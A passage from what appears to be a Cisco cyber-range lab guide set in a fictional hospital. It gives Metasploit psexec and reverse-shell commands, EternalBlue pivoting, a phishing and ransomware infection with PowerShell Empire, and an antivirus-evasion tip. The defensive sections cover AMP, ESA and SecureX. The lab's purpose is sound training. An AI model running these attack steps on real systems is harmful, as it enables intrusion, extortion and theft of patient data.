    1. msf5 exploit(multi/handler) > use exploit/windows/smb/psexec

    2. msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp

    3. msf5 exploit(windows/smb/psexec) > set LHOST 198.18.133.6

    4. msf5 exploit(windows/smb/psexec) > set LPORT 455

    5. msf5 exploit(windows/smb/psexec) > set RHOST 127.0.0.1

    6. msf5 exploit(windows/smb/psexec) > set SMBDomain ad.hackmds.com

    7. msf5 exploit(windows/smb/psexec) > set SMBUser Administrator

    8. msf5 exploit(windows/smb/psexec) > set SMBPass C1sco12345

    9. msf5 exploit(windows/smb/psexec) > exploit -j

     32   

    You should now see that a domain controller is compromised. You may need to run exploit -j a few times to get the domain controller compromised. In the next example, the first attempt showed a timeout, while running exploit -j a second time successfully gained access to the domain controller.

     33   

    You will know you have successfully compromised the domain controller when you see the system appear on the attack window within Armitage.

     34   

    We are going to pivot through this domain controller to the rest of the network. One of the ways we can do this is to listen and passively look for other hosts. For our next example, we will assume we performed reconnaissance and found one subnet that exists on 198.19.30.0/24. Armed with this information, we are going to execute the next stage of the attack. At the meterpreter> prompt, found by clicking the Console X tab, type back.

     35   

    You should now be at the msf> prompt. Type sessions -i. Note this is sessions with a lowercase i.

     36   

    You should see a session with ID of 1 and 2 representing the two compromised systems. Make note of these as we will be interacting with each of these devices based on their ID. Type “route add 198.19.30.0/24 2” at the msf> prompt to add a route to the second system via ID 2. This command will route ALL 198.19.30.0/24 traffic through meterpreter session 2.

     37   

    Now that we have a route to the internal network through the compromised domain controller, we want to scan for hosts on the 192.168.30.0/24 network. This is where the nurse shared workstation and other valuable HIPAA data lives. To do this, select the “Hosts” menu in Armitage, then “MSF Scans”.

     38   

    In the input box, enter “198.19.30.96/29” and click ok to start the scan.

    Note:  MSF Scans are notoriously slow. It is NOT unusual for these scans alone to take 10-20 minutes. We deliberately set a small range so that the lab finishes on time.
     39   

    You will see a scan tab open at the bottom, which shows the results of the scan. You will start to see newly identified systems shown in the top panel. You may have to drag those systems to see them. You can tell you have hosts on top of each other by the blurred name. Dragging them will reveal how they are connected.

    You can also use the auto layout option to view the identified devices. We suggest the Stack option.

     40   

    When we identify a system with a possibly vulnerable service in the listening state, we can send an exploit to that system through a previously compromised system. This allows us to move laterally across the HackMDs network. You should eventually see the 198.19.30.102 device. If you go back to the scan tab and scroll up to view the results, you should see that the .102 system has port 445 open. We can abuse this!

     41   

    To abuse this open port, we will use the ms17_010_eternalblue exploit. This exploit was used in the WannaCry attacks. Click back to the Armitage search window and search for the term “eternal.” Click the eternalblue option that comes up (not the win8 version).

     42   

    Fill out the RHOST as 198.19.30.102 and check use a reverse connection. Then, click Launch.

    Note:  If the target had the Cisco AMP Connector version 6.0 or higher installed, we would have the ability to prevent this attack using its exploit prevention module.
     43   

    You should see shells to each of the workstations being targeted, with the latest victim being the 198.19.30.102 system. As with any of the shell modules, there are post modules that allow you to take these shells and elevate them to meterpreter shells for additional persistence and exploitation.

    Note:  You may have to run this attack a few times to get it to work. In the real world, exploitation doesn’t work the first time or every time!

    Summary

    This advanced lab demonstrated how real attackers can utilize an exploited system to pivot deeper into a compromised network. In this example, we started off by compromising a DMZ server through a struts2 vulnerability. We performed some scanning and found a hole in the firewall that was opened for the Active Directory server. We used that Active Directory server to scan deeper into the network and identified a nurse workstation that is vulnerable to the well-known eternalblue exploit. Using that exploit, we gained a shell and could now go deeper into the network, use this system to perform attacks against other systems, steal data from this system, or carry out many other malicious activities.

    Real world attacks typically are a chain of exploitation. Layered security is critical to preventing this from happening to your network.

    • Enabling Cisco Firepower reputation and URL features prevents known malicious sources from communicating with the DMZ server.

    • Enabling Cisco Firepower IPS would identify exploitation behavior against vulnerabilities.

    • Enabling Cisco AMP within Firepower would identify and prevent any use of payloads, such as the ones used for this advanced lab.

    Congratulations! You have now completed this scenario, including the Bonus and Advanced sections.

    The Ransom Scenario: Respond to Advanced Persistent Threats (APTs)

    Value Proposition: In this scenario, we will be exploring how malware could function. There are several types of Malware, some of which are extremely automated in nature to attack as many people as possible with the least amount of intervention. The attacks used in today’s lab will focus on manually infecting a user and later laterally moving around the network to infect other systems. This is a common characteristic of an APT (Advanced Persistent Threat), mixed with traditional BotNets and newer Ransomware.

    In this scenario, Mr. Black has hired you, Mr. Blue to hold the hospital’s valuable data up for ransom. The goal is to quickly encrypt all the data within reach and squeeze as much money as you can from the HACKMDs Hospital. You will do this by scaring them with the threat of destroying their patient records and mission critical system files. You also have other malicious options including taking out their network or publishing sensitive information to destroy their market reputation.

    For this attack, you will take the approach of using social engineering to trick an end user by emailing a fake medical record document and convincing them to open it on their personal computer. This document contains macros, which run automatically on the victim’s machine and drop three pieces of software. The malicious software consists of an encrypted ransomware payload and an antivirus-evading component designed to evade traditional A/V tools. Real-world malware is known to have anti-antivirus, anti-sandbox and other tricks built in to avoid detection by security solutions.

    When the victim opens the document, the victim’s machine will be infected with ransomware as well as infected with a Remote Administration Tool (RAT). The RAT will allow a remote attacker to issue commands and execute them locally at HackMDs so that the attacker can install ransomware on other machines within the HackMDs environment.

    Antivirus evasion can be accomplished in several ways. Many antivirus scanners have difficulty with, or will not scan, binaries that are compiled from something other than C. For example, taking code and compiling it in Google’s Go language or Python would be an effective method for bypassing many common antivirus offerings.

    Outcome

    At the end of this scenario you will have launched a realistic compromise of HackMDs’ network using a simulated advanced persistent threat. You will have launched a phishing attack to trick a victim into opening a fake medical record, infecting that system with ransomware and a RAT.

    After launching the attack, you will switch to the defender side and use Cisco Advanced Malware Protection (AMP) at the network and host level to identify and remediate the ransomware and RAT software. In addition, Cisco Umbrella will be installed so that, in the event an infected system has been compromised with all other tools bypassed, we have another mechanism to prevent infection by securing the DNS layer. By blocking the ransomware’s phone-home communication, the asymmetric encryption process cannot complete, which prevents your files from being encrypted.

    Ransom WHERE? Not HERE!

    Lab Resources

    • Attacker Resource 1: Kali Linux 2.0 sitting on the outside network

    • Attacker Resource 2: Ubuntu Server hosting various tools for the attacker

    • Target Resource 1: HackMDs internal user

    • Defender Resource 1: Cisco Advanced Malware Protection (AMP) for Endpoints

    • Defender Resource 2: Cisco Advanced Malware Protection (AMP) for Networks

    • Defender Resource 3: Cisco AMP Threat Grid

    • Defender Resource 4: Cisco Email Security Appliance

    Verify you can access the Botnet Command and Control Server

    In this lab, Mr. Blue (you) will trick a HackMDs user into opening an email that contains a fake medical document. You will act out the victim by clicking the document and infecting the host system. You will see the ransomware encrypt your files, representing sensitive information.
    Note: We will be using a script to automatically create your public AMP account. This will also trigger the creation of a Cisco SecureX and Cisco CTR account.

    As the defender, you will enable Cisco Advanced Malware Protection (AMP) to identify the malicious software. You will attempt the attack again, see AMP identify the malicious behavior and prevent the infection from occurring.

    • Username for the Kali Linux Attack server is root, and the password is C1sco12345.

    • Username for AMP online console will be auto-generated.

    Note: As an attacker, we will be connecting to our Attacker Kali and on the Kali Linux we will be able to restage attacks.

    Procedure


     1   

    Connect to the Kali Linux system.

     2   

    Type the following commands (remember Linux is case-sensitive):

    1. # /bin/bash

    2. root@kali:~# cd /root

    3. root@kali:~# ./start-empire.sh

    Note: PowerShell Empire is a post-exploitation framework that penetration testers and criminal hackers use to test or attack vulnerable systems. It runs on the PowerShell command shell built into Windows, which helps it evade detection and bypass restrictions.
     3   

    You can validate if empire is running by typing the command screen -ls. You should see one instance running via “1 Socket” as shown.

     4   

    Note that in this lab we will be using a command line mail client. Know that any common e-mail platform will function in a similar manner. Let’s begin sending email.

    Note: The email content won’t matter since you are acting as both the victim and attacker. In the real world, you would need to develop a clever message that would trick your target to perform the following actions or they would probably delete your email.
     5   

    To look at our mail attack script, type the following command in a Kali Linux terminal: “cat /root/Desktop/send-phish.sh”. You should see the contents of the phishing message script you are using to trick the user into installing your payload.

    Note:  The script sends 4 different emails and works as follows: the echo of “This is Important” is the body of the message; it is piped into mutt, which is a mail client. The mutt flags are -s “Subject” and -a “Attachment”, and the 2 target mailboxes are nurse@hackmds.com and dhowser@hackmds.com.
     6   

    Use the command cd Desktop to get to the desktop. Next, run the script, which will send the phishing emails, by typing: “./send-phish.sh”.

    ./send-phish.sh

    Note: There is a period (.) before the /send-phish.sh in the command. If running from root doesn’t work, go to the Desktop and run the script there.
     7   

    Note that we will discover what the first attachment is in the next section. The second attachment is a Word Document file that has a customized, constructed set of macros.


    Email Security Failure

    In this part of the lab, we will look at what HackMDs’s email security tool saw after you launched the phishing attack. We have disabled almost all security features other than antivirus to show why it is important to have more than signature-based / pattern-matching email security capabilities. The following image shows all the capabilities that an enterprise email security solution such as Cisco Email Security Appliance (ESA) offers. For this lab, we only have the Sophos antivirus capability enabled. If the other capabilities were enabled, the phishing emails would never reach Dr. Howser.

    Let’s first explore what happened to our first email, working from the Jumphost.

    Procedure


     1   

    Open Firefox and navigate to: https://smtp.hackmds.com. You can also use the quick link, as shown, to access Cisco ESA.

     2   

    Log in with user admin and password C1sco12345. You will see the Cisco Email Security Appliance (ESA) main dashboard.

     3   

    Scroll down the right side of the screen to view some high-level statistics regarding what type of mail is being seen by the HackMDs users.

    ESA can use multiple engines to classify and detect malware. These engines can be enabled and used in tandem. We should have messages that are classified as ‘virus detected’. This is not abnormal. Antispam gateways block spam and other types of malicious traffic. Let’s look at what our script tried to submit into the environment. In our lab, we are going to look at the Message Tracking menu. Because the menu system can be long and some screen resolutions are not accommodating, we decided to provide a link directly to ESA Message Tracking.

     4   

    In Chrome, in another tabbed window, click the ESA-MessageTracking button from the pre-saved bookmarks.

     5   

    From the message tracking system click the Search button.

     6   

    Review the recent messages, and then locate one that mentions “Dropped by antivirus.” Then, click Show Details.

    Tip: 

    Refresh your browser and/or re-click the quick link to refresh the screen a few times, and you will soon see the SPAM mail appear. It might take a few minutes from when you sent the email. You can also search for it.

     7   

    At this point, we can see a list of which engines and what processes the system used to determine that this email contained a virus file. Specifically, Sophos Antivirus flagged this file as an infected executable. This is a true-positive since the file is a Metasploit Meterpreter backdoor for which many systems automatically have signatures.


    We have learned that email antivirus is an important layer, but one that can be beaten. In ESA, we disabled many features (all but antivirus) to allow these malicious emails through. Enterprise email security solutions, such as Cisco ESA, offer many more detection engines that are not limited to pattern matching / signature-based detection.
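    As an added example of what inspection beyond signature matching looks like (Python written for this page, not code from Cisco ESA or from the lab), the following builds a constructed message shaped like the phishing script’s output with two harmless stand-in attachments, then classifies each attachment by its structure: a PE executable by its MZ header, and a macro-enabled Word document by the vbaProject.bin part inside its OOXML zip. The sender address, filenames and stand-in bytes are constructed; only the dhowser@hackmds.com recipient and the “This is Important” body come from the text.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Attachment categories this inspector quarantines regardless of AV verdict.
BLOCK = {"pe-executable", "office-macro"}


def build_sample_eml():
    """Constructed message shaped like the phishing script's output (not the
    lab's real files). The 'exe' is just the PE magic plus padding; the
    'docm' is an empty OOXML-style zip whose word/vbaProject.bin part is the
    container Word uses for VBA macros."""
    msg = EmailMessage()
    msg["From"] = "sender@example.test"   # constructed sender
    msg["To"] = "dhowser@hackmds.com"
    msg["Subject"] = "Important"
    msg.set_content("This is Important")

    fake_exe = b"MZ" + b"\x00" * 62
    msg.add_attachment(fake_exe, maintype="application",
                       subtype="octet-stream", filename="record_viewer.exe")

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="medical_record.docm")
    return msg.as_bytes()


def classify_attachment(data):
    """Classify by file structure, not by filename or a signature database."""
    if data[:2] == b"MZ":
        return "pe-executable"
    if data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
        except zipfile.BadZipFile:
            return "corrupt-zip"
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            return "office-macro"
        if any(n.startswith(("word/", "xl/", "ppt/")) for n in names):
            return "office-document"
        return "zip-archive"
    return "other"


def inspect_message(raw):
    """Return [(filename, category)] for every attachment of a raw message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_content()
        if isinstance(data, str):        # text/* attachments come back decoded
            data = data.encode("utf-8", "replace")
        findings.append((part.get_filename() or "(unnamed)",
                         classify_attachment(data)))
    return findings


def verdict(findings):
    return "quarantine" if any(cat in BLOCK for _, cat in findings) else "deliver"


if __name__ == "__main__":
    found = inspect_message(build_sample_eml())
    for name, cat in found:
        print(f"{name}: {cat}")
    print("verdict:", verdict(found))
```

    The point of the structural check is that it catches the macro document even though no signature exists for it, which is exactly the attachment that the signature-only configuration in this lab lets through.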

    Set Up Cisco AMP

    Procedure


     1   

    In this lab, we will be using a cloud-managed endpoint security solution called Cisco AMP for Endpoints. Managing endpoints from the cloud is ideal, since endpoints can be connected to networks anywhere around the world. For this lab, we have created a script that automatically generates a new AMP administration account.

     2   

    On the Jumphost desktop, click the green icon called Demo Ready.

     3   

    This will bring up a pop-up window that includes your Cisco Duo login (used for another lab module) and your Cisco AMP account. This account is unique to your lab and will be deleted once the dCloud session expires not when the timer runs out.

     4   

    Within your web browser, click the AMP tab. This is the administration portal for your AMP deployment.

     5   

    You will need to copy the username and password from the popup that came from the script. This login information is unique to your lab. Once copied, click Log In. To simplify the process, you can use the copy buttons to copy each item. Sometimes you may see an “expired token” error when logging in. Just log in a second time and it will work.

     6   

    Once you log in, you will be presented with the main AMP dashboard.

     7   

    You need to deploy AMP to some endpoints. You can do this by clicking Management and selecting Download Connector.

     8   

    This will bring you to the connector download page. First, we need to select a group. We will go with Protect.

     9   

    Next, we will use the Windows Connector. We will use the URL approach meaning an end user can just paste the URL and download the connector. Click Show URL under Windows and select to Copy the URL.

     10   

    Now, we need to log in to the Dr.’s workstation using remote desktop. Notice that on the jumphost desktop there is a remote desktop link to the Dr.’s workstation. Click it.

     11   

    You will see a warning. Click Connect.

     12   

    Log in with the password C1sco12345.

     13   

    Open a web browser, right click and paste the URL you copied from the AMP console.

     14   

    This will bring up a popup asking to download Cisco AMP. Click Save File.

     15   

    Now you need to install this file. It was downloaded into the downloads folder. One way to get to that is to click the download arrow followed by clicking “Show All Downloads”.

     16   

    You will see the AMP connector. Double-click to install it, and then wait a few minutes for it to install.

     17   

    When installation is complete, you can choose to add an icon to the desktop. You will now see the Cisco AMP for Endpoints is installed and connected.

     18   

    Let’s validate that the connector is associated with your account. You can either close or reduce the RDP session to bring back the jumphost desktop. Click the browser tab that was reduced to bring the Cisco AMP login screen. You will have to log in again.

     19   

    Click Management, and then choose Computers.

     20   

    This will bring up the computers this AMP account is managing. If you see 0 computers, you will need to go back to the Dr. Workstation, uninstall and reinstall AMP. The next image shows successfully managing the Dr.’s computer.

    Note:  If you don’t have one computer, the following steps are used to uninstall and reinstall AMP. Skip the following step if you are successfully managing the Dr.’s Workstation.
     21   

    Go back to the Dr. Workstation. Click the All programs button and select the Control Panel. Make sure you are using the Dr.’s connection and not the Jumphost Program button!

     22   

    Click Programs and Features.

     23   

    Double-click Cisco AMP for Endpoints Connect to uninstall it.

     24   

    Wait for a few minutes for the uninstall to complete.

     25   

    Now, download AMP again and re-install it.

     26   

    Log in to the AMP account, click Download Connector, choose Protect as the policy, choose to copy the URL for the Windows option, and then go back to the Dr. Workstation and paste that link into your web browser.

     27   

    Download AMP again and install it. When done, verify in AMP that you now manage the system.


    Infect the Victim Part 1 (Failure)

    What happened to our other phishing documents that made it through the email scanner? Let’s find out. At this point, you will play the victim. This means you need to connect to that system and log in as an employee. In this example, you are the employee called Dr. Howser.

    Procedure


     1   

    Open Outlook by clicking the desktop icon, as shown, on the Dr.’s workstation that you just installed Cisco AMP on.

     2   

    You should now see the fake email in Dr. Howser’s inbox. Click the email.

     3   

    Read it, and then double-click the Word document. This represents how users would fall for this phishing attack and execute an unauthorized file. This happens all the time in the real world.

     4   

    Microsoft Word will start up.

     5   

    Click the Enable Editing button.

     6   

    Once the file opens, the phishing document will tell you to enable macros. Click Enable Content.

    Note:  The command-line window will open behind the Outlook client. Real malicious software would run in the background to avoid things like this since this behavior would alert the user that something is not right with the file. We didn’t focus on stealth since this is a lab environment. Real malware would hide and attempt to spread at this point also. 
     7   

    It is more likely that Cisco AMP will prevent this from even coming up. You can try to open it a few times to see.


    Investigate the Attack

    Procedure


     1   

    Let’s flip back to the SOC and see what Cisco AMP found regarding Dr. Howser’s computer. Log into AMP if it has timed out. Click the Overview Dashboard to get a quick look at what’s going on.

     2   

    The Overview provides a straightforward, simple view of activity. Under Threats Detected, you see how many times you tried to open the malicious file. You have access to all quarantined files and to the number of computers that have connectors deployed. Scroll down to see that the Dr. is the user behind the issue, which points to a Microsoft Outlook / Microsoft Word file.

     3   

    Let’s go deeper into these issues. Click Analysis, and then select Events.

    You will see the malware attempted to install but was Quarantined by Cisco AMP. In my example, I tried to open the file multiple times. Think of this as an end user getting frustrated that they can’t open a file that is laced with Ransomware. Hopefully they call helpdesk so you can explain to them why this file isn’t opening!

     4   

    Click the triangle to drop down more details about the action taken for one of the quarantined events. Here we see the file was found within Outlook, but it’s a .exe. If you click the SHA-256 / Fingerprint of what flagged this as malicious, you will see options come up. Click Full Report (in blue) to see what other security vendors see this file as.

     5   

    This brings up what VirusTotal sees regarding this file. We can see many vendors have found this threat as real and something you want to avoid. Let’s go back to Cisco AMP.

     6   

    Next, let’s click the computer with the wires to view this file’s trajectory, meaning what it did as it tried to execute.

     7   

    To make things easier to see, click Use Legacy Device Trajectory.

    This will zoom in on the trajectory the file took. This is critical for seeing exactly what was done when this file attempted to execute. Here, we can see that a specific patient’s medical record file was deemed malicious, due to launching a Downloader.Powershell file, and, as a result, Cisco AMP has quarantined it. You can see the event details on the right and the timeline in the center. You can scroll the time back to see the entire history of this file’s execution with AMP. This important concept is known as retrospective security: the ability to “go back in time” to fully understand what a program has done. As you can see, there is more going on than matching malware against signatures. Cisco AMP attempts to learn everything it can about a file and monitors for unusual, as well as malicious, activity, known in the industry as behavior-based antimalware.
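    To make the retrospective idea concrete, here is an added example in Python (not AMP’s code or data) of an index that stores every file sighting by hash and, when a verdict later turns malicious, returns the earlier sightings as the retrospective alert. Host names, paths, tick times and the SHA-256 placeholders are all constructed.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Sighting:
    """One connector observation of a file on a host. `ts` is a constructed
    integer tick, not a real timestamp."""
    ts: int
    host: str
    action: str      # "created", "executed", "moved", ...
    path: str
    sha256: str


class RetrospectiveIndex:
    """Keeps every sighting keyed by hash so that a verdict which arrives
    later can be applied backwards to events that already happened."""

    def __init__(self):
        self._sightings = defaultdict(list)   # sha256 -> [Sighting]
        self._verdict = {}                    # sha256 -> "clean" | "malicious"

    def verdict(self, sha256):
        return self._verdict.get(sha256, "unknown")

    def record(self, sighting):
        """Store the sighting and return what was known about the hash at
        that moment (an 'unknown' file is allowed to run)."""
        self._sightings[sighting.sha256].append(sighting)
        return self.verdict(sighting.sha256)

    def update_verdict(self, sha256, verdict):
        """Apply a new disposition. When a hash turns malicious, return all
        earlier sightings in time order: that list is the retrospective
        alert, and it covers hosts that ran the file while it was still
        'unknown'. Repeating the same verdict raises no second alert."""
        previous = self.verdict(sha256)
        self._verdict[sha256] = verdict
        if verdict == "malicious" and previous != "malicious":
            return sorted(self._sightings.get(sha256, []), key=lambda s: s.ts)
        return []

    def affected_hosts(self, sha256):
        return sorted({s.host for s in self._sightings.get(sha256, [])})

    def trajectory(self, sha256):
        """Chronological (ts, host, action, path) tuples for one hash."""
        return [(s.ts, s.host, s.action, s.path)
                for s in sorted(self._sightings.get(sha256, []), key=lambda s: s.ts)]


# Constructed placeholders; a real index would hold 64-hex-digit SHA-256 values.
DOC_HASH = "SHA256-PLACEHOLDER-MEDICAL-RECORD-DOCM"
DROPPER_HASH = "SHA256-PLACEHOLDER-DOWNLOADER-PS1"


def demo():
    """Replay a constructed timeline: the document is written and opened on
    the Dr.'s workstation, drops a downloader, is copied to a second host,
    and only then does the cloud verdict flip to malicious."""
    idx = RetrospectiveIndex()
    idx.record(Sighting(100, "DR-WS", "created", r"C:\Users\dhowser\Downloads\medical_record.docm", DOC_HASH))
    idx.record(Sighting(110, "DR-WS", "executed", r"C:\Users\dhowser\Downloads\medical_record.docm", DOC_HASH))
    idx.record(Sighting(115, "DR-WS", "created", r"C:\Users\dhowser\AppData\Local\Temp\Downloader.ps1", DROPPER_HASH))
    idx.record(Sighting(200, "NURSE-WS", "created", r"C:\Users\nurse\Desktop\medical_record.docm", DOC_HASH))
    alert = idx.update_verdict(DOC_HASH, "malicious")   # the retrospective alert
    return idx, alert


if __name__ == "__main__":
    index, alert = demo()
    for s in alert:
        print(f"t={s.ts} {s.host} {s.action} {s.path}")
    print("hosts needing attention:", index.affected_hosts(DOC_HASH))
```

    The alert names both workstations even though the file was “unknown” when each of them first saw it; that is the property the trajectory view in AMP gives you, and it is only possible because sightings are kept whether or not the file looked suspicious at the time.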

     8   

    Click Use Legacy Device Trajectory again to reduce the zoom.

     9   

    Go back to AMP and feel free to view other details about this prevented threat. Notice that you can release the file back to the system, which in this case would be a very bad idea.

    We can see that we have prevented this threat from fully executing. Later, we will uninstall AMP and infect the system to show you what ransomware looks like when installed on a system without an advanced malware detection tool such as AMP protecting it. Before doing so, let’s set up SecureX.


    Set Up Cisco SecureX

    Cisco SecureX is a centralized threat intelligence and incident response tool that comes free with an investment in Cisco Security technology. In this part of the lab, we will leverage our new AMP account to enable a Cisco SecureX account. We will add public AMP and our enterprise Stealthwatch account to SecureX.

    Procedure


     1   

    Click the Cisco Threat Response tab to bring up the login screen.

     2   

    Click the Cisco Security Account to use your existing AMP account to log in.

     3   

    Now that you are logged in to Cisco Threat Response, let’s activate your SecureX account. At the bottom of the screen, click the Home button.

     4   

    On the top, right-hand side of the screen, click the Launch button.

     5   

    Again, choose to use your Cisco Security Account to log into SecureX.

     6   

    You will have to log in to SecureX and authorize AMP for Endpoints to use SecureX. This essentially allows Cisco Security to log in, since we are using our AMP account for authentication.

     7   

    You should be logged into Cisco SecureX. Click Skip Tour to skip the overview unless you are interested in the introduction details provided upon first log in.

     8   

    On the top left are available applications to launch. Threat Response (also called Cisco Threat Response or CTR) is an incident response tool. The Security Services Exchange enables a Cisco customer to associate all other Security products with smart licensing to be added to SecureX, if supported. We won’t be able to use this in the current version of this lab since Smart Licenses are real accounts tied to customers. For this lab, we will be using APIs available on our recently created AMP account.

    Note: You are welcome to try adding other tools such as Shodan and Radware if you have accounts.
     9   

    Let’s add our AMP account by clicking ADD for AMP for Endpoints.

     10   

    You will see instructions for creating your API keys within AMP that will be used by SecureX. Go back to AMP. Choose Accounts and select API Credentials. You may need to click the minus on the right corner of the SecureX window to reduce it so you can see the full AMP page.

     11   

    You will see that you don’t have any API credentials set up, so click New API Credential.

     12   

    Give your new API credential a name such as SecureX. Choose Read and Write, then select Create.

     13   

    You will see your new API client ID and API key. You will copy these into SecureX.

     14   

    Go back to SecureX and copy both the API client ID and the API key into the proper fields. Choose to act in the name of the active user and click Save.

     15   

    Click Dashboard to see that AMP for Endpoints is now part of the Applications & Integrations panel on the left.

     16   

    You can add items from AMP to the dashboard by clicking Add Tiles and choosing different tile options. Make sure to choose the Summary option as one of them.

     17   

    Scroll down to the tile that shows the Summary from AMP. Choose the Computer Compromised link.

     18   

    This will cross-launch Cisco AMP and show details of the Dr.’s system that was protected by Cisco AMP. SecureX can now act as your centralized dashboard monitoring for threats from different tools. Right now, you just have AMP added but there are dozens of Cisco and non-Cisco tools that can be integrated into SecureX giving you visibility across all parts of your network, datacenter and clouds. In this example, you found a system had an event and within one click, you were in Cisco AMP seeing details about what occurred.

    SecureX is powerful enough to combine all your security tools into one dashboard. This current version of the CDC is limited, due to the smart licensing required to make it work. If all of HackMDs’ tools were added, you could see that this threat was sent via email with the ESA integration. Any malicious actions seen by the attacker system (198.18.133.6) within Firepower, Splunk, QRadar, or Stealthwatch would all be tagged (connected) to this event, since SecureX can correlate events across multiple tools.

    Note: This lab example shows less than 5% of what SecureX can do for you. We will be adding more in the future.

    Remove AMP and Infect the Host Part 2

    Procedure


     1   

    Now let’s see what Cisco AMP saved us from by removing Cisco AMP and infecting the host with ransomware. We can install AMP afterwards, but the damage will already be done, since this is public/private key (asymmetric) based ransomware. The point of this part of the lab is to learn how real ransomware functions, as well as to better understand what AMP was looking at and prevented in the previous attempted exploit.

     2   

    Remote desktop back to the Dr. Workstation from the jumphost.

     3   

    Click the All Programs button and choose the Control Panel. Make sure you are using the Dr.’s Programs button and not the Jumphost!

     4   

    Click Programs and Features.

     5   

    Double-click Cisco AMP for Endpoints Connect to uninstall it.

     6   

    Wait a few minutes for the uninstallation to complete. When it completes, you are ready to go through the infection process again.

     7   

    On your desktop, click the Microsoft Outlook icon to open Outlook.

     8   

    Open Outlook by clicking the desktop icon as shown, from the Dr.’s workstation.

     9   

    You should see the fake email in Dr. Howser’s inbox from the previous attack. Click the email again and open the attachment.

     10   

    Microsoft Word will now start up. In the Microsoft Word document, you will be asked to “Enable Editing” in the Protected View yellow ribbon bar. Click Enable Editing button then from the Security Warning click the “Enable Content” button.

     11   

    Once the file is executed, the Phishing Document will tell you to enable macros. Click Enable Content.

    Note:  The command-line window will open behind the Outlook client. Real malicious software would run in the background to avoid things like this, since this behavior would alert the user that something is not right with the file. We didn’t focus on stealth since this is a lab environment. Real malware would also hide and attempt to spread at this point.
     12   

    The command-line window may open behind the Outlook client.

     13   

    Close the Microsoft Word application completely.

     14   

    If you receive an error about spoolsvc.exe not starting, ignore it. Click Close the Program.

    Now is a GREAT time to take a break, as you will need to wait about 5 minutes before the ransomware messages automatically start to pop up on Dr. Howser’s computer. Wait until you see the following examples of the successful ransomware infection show up on the Dr. Workstation before proceeding to the next step.

    At this point, you have played out the role as the victim and had your system infected with ransomware.


    Incident Response: Post Infection

    Now that your Dr.’s computer is infected with ransomware, let’s pretend you are performing an incident response to the situation. You now need to install Cisco AMP. You cannot remediate the damage that has already occurred. This version of ransomware uses asymmetric / public key encryption. The attacker holds the private key required to decrypt the victim’s files. AMP can prevent the spread of the infection and stop any future exploitation; however, the encrypted files are a lost cause at this point.

    Procedure


     1   

    Repeat the process of accessing Cisco AMP, Clicking Management -> Download Connector, Choosing Protect and copying the URL. Go to the Dr.’s workstation, open a web browser and paste the connector link so you once again download AMP. Install AMP but make sure it’s the new connector you just downloaded and not the older link. You will see older files are encrypted by the ransomware.

     2   

    Click Management > Computers to go back to the Cisco AMP dashboard on the Jumphost and confirm you are managing the system.

     3   

    Go back to the Dr. Computer and open the malicious document again. This will allow AMP to collect more information about the ransomware.

     4   

    Once you open the ransomware again, go back to the jumphost, access Cisco AMP and click the Dashboard tab to bring up an overview of what is going on.

     5   

    Scroll down to find interesting malicious artifacts that were collected by Cisco AMP.

    This data is different from our example before, because the ransomware has already downloaded its payload to the system. Note the importance of Retrospective Security: the ability to see what is running so you can better understand the damage that has been done to an infected system.

    The last time you infected the system during this lab was when Cisco AMP was installed. These artifacts were not installed and running at that time. This means we are looking at a different investigation since this is a response to a successful exploit rather than reviewing what was prevented.
     6   

    To see options for your investigation, click an artifact. For our example, click the VirusTotal link to confirm this is the TeslaCrypt ransomware.

     7   

    Go back to AMP. Scroll up and choose Analysis and Events.

    Here you will see there are a few things executing due to this infection. First there is a 77c8.exe file, which has been labeled as TeslaCrypt ransomware. But wait, there is more! There is a PowerShell Empire component of this attack running as well? Also, what is this spoolsv.exe file?


    Summary

    It looks like the Ransomware is a smoke screen and/or distractor for some other attack! Thankfully, you have tools like Cisco AMP to identify what is really going on.

    Congratulations! You have now completed Scenario 4.

    Insider Threats: Move Within to Obtain and Export Your Data

    Value Proposition: Perimeter security is not 100% effective, meaning eventually a malicious entity will breach your network. The step that typically follows a breach is establishing a foothold inside a target’s network. Once attackers are inside a network, either through malicious software or through a remote connection, they will need to understand the internal environment. This is typically accomplished by scanning the environment. Once internal targets are identified, attackers will attempt to access other systems, also known as pivoting. The goal is typically to identify systems of interest so they can obtain something of value. This process has been documented and modeled as the Attacker Kill Chain.

    In this scenario, Mr. Green has sold login credentials stolen from an administrator for the workstation on wheels (WoW) located within HackMDs.com’s headquarters to Mr. Black. This permits Mr. Black to be able to connect into the HackMDs network as an authorized user. This is just one example of the many real-world methods attackers can obtain a foothold inside your network!

    Mr. Black doesn’t want to get his own hands dirty, so he has contracted Mr. Brown (you) to use the stolen credentials to access HackMDs and steal sensitive patient records. Mr. Brown’s objective is to access the WoW system and move to other systems or pivot to identify a method to gain access to systems that contain sensitive data. When Mr. Brown can access sensitive data, his final goal will be to export the data off the network to a remote cloud storage server. He will later provide access to the cloud server to Mr. Black so Mr. Black can sell the stolen data on the dark web.

    Outcome

    At the end of this scenario, you will have a basic understanding of what attackers do once they breach a network. You will have accessed a network and performed internal reconnaissance to identify what the internal network of HackMDs.com looks like. It is important to be aware that real attackers will use a stealthier approach to performing reconnaissance to avoid being detected; however, we have removed those requirements due to the short time provided for this lab.

    Once you have learned the network, you will have connected to internal systems containing HIPAA data and performed data exfiltration, representing the goal of many cyber breaches. Once again, real-world attackers would use stealthier methods to hide the data exfiltration actions; however, we have simplified this process for this lab scenario. It is also important to point out that if security measures are not implemented to detect insider threats, detecting and preventing Mr. Brown would fail regardless of the amount of stealth used by the attacker!

